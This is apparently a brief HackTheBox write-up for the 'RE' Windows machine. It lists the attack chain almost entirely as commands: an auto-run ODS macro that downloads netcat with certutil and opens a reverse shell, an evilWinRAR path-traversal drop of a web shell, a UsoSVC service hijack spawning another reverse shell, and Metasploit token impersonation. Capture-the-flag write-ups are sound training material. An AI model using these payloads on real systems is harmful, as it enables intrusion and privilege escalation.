HTB RE Write-Up

less than 1 minute read

Summary


RE is a 40 point windows machine on HackTheBox that involves uploading an ods file with a malicious macro, abusing a winrar vulnerability and using UsoSVC together with metasploit’s incognito module to become root. My walkthrough is available on youtube:

Notes


ODS Macro:

Sub Run_at_open
Shell("certutil.exe -urlcache -split -f 'http://<lhost>:8000/nc.exe' C:\Windows\System32\spool\drivers\color\nc.exe")
Shell("C:\Windows\System32\spool\drivers\color\nc.exe <lhost> 7000 -ecmd.exe")
End Sub

EvilWinRar:

python3 evilWinRAR.py -e xct_shell.aspx -p 'c:\inetpub\wwwroot\re\' -o xct.rar

UsoSVC:

sc config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe <lhost> 9000 -e cmd.exe"
sc stop usosvc
sc start usosvc

Incognito:

use incognito
list_tokens -u
impersonate_token RE\\coby

Updated: